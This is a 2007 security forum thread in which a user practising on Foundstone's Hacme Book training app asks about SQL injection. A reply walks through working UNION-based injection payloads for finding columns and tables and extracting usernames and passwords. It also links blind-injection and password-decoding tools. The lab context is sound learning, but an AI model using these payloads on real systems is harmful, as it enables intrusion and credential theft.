Government Security
Network Security Resources

Jump to content

Photo

Need Help With Sql Injection In "search" Form

- - - - - sql injection sql
  • Please log in to reply
1 reply to this topic

#1 virgoman

virgoman

    Private First Class

  • Members
  • 47 posts

Posted 11 December 2007 - 07:28 PM

Hi All,

I'm working on Foundstone's Hacme Book. I wanted to know about the database entries through Search form. I tried but it doesn't work.

Can anybody guide me with the procedure for SQL injection with Search form...?


Virgoman........!!!!!!

#2 jacco

jacco

    Private First Class

  • Members
  • 58 posts

Posted 12 December 2007 - 06:47 AM

try;
hxxp://www.testsite.com/search.php?q=test' and 1=1 --

then try;
hxxp://www.testsite.com/search.php?q=test' and 1=2 --

If the first query gives results and the second one says "no results found" the search form could be vulnerable to SQL-injection.

to find out how many columns the select query returns try;
hxxp://www.testsite.com/search.php?q=test' or 1=1 ORDER BY 1 --
if no error, the select-query returns at least 1 column

try;
hxxp://www.testsite.com/search.php?q=test' or 1=1 ORDER BY 2 --
if no error, the select-query returns at least 2 column
and so on until you get an error.

if you know how many columns the select query returns you can try to find out what column is shown where in te search result overview by trying this query:
(for example when the search-query returns 3 collumns);

hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' --

now you need to find out if some interesting table exists by trying;
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM user --
or;
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM users --
or;
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM session --
also try some change in lower and uppercase and try some prefixes like; cms_ or websitename_
For example;
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1','2','3' FROM cms_User --

If you found a table that exists you can try guesssing collumn names like this;
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1',username,'3' FROM cms_User where 1=1 --
or
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1',password,'3' FROM cms_User where 1=1 --

if you figured out the table names and collumn names you could make a query like;
hxxp://www.testsite.com/search.php?q=test' AND 1=2 UNION SELECT '1',loginname,password FROM cms_User where 1=1 --
This select query wil return all users with there password


If it is a POST form instead of a GET form, remove "hxxp://www.testsite.com/search.php?q=" from all example lines and past the rest of the example line in the search input box
If it doesn't work, try all the above while replacing all singe quotes with double quotes
If it's blind SQL-injection try using mysqlbf, mysqllst and mysqlget. download them here : hxxp://www.reversing.org/node/view/11
If passwords are encoded try decoding them with this POC : hxxp://www.sqlhack.com/poc.c


Good luck!!

Greetingz,
Jacco





Also tagged with one or more of these keywords: sql injection, sql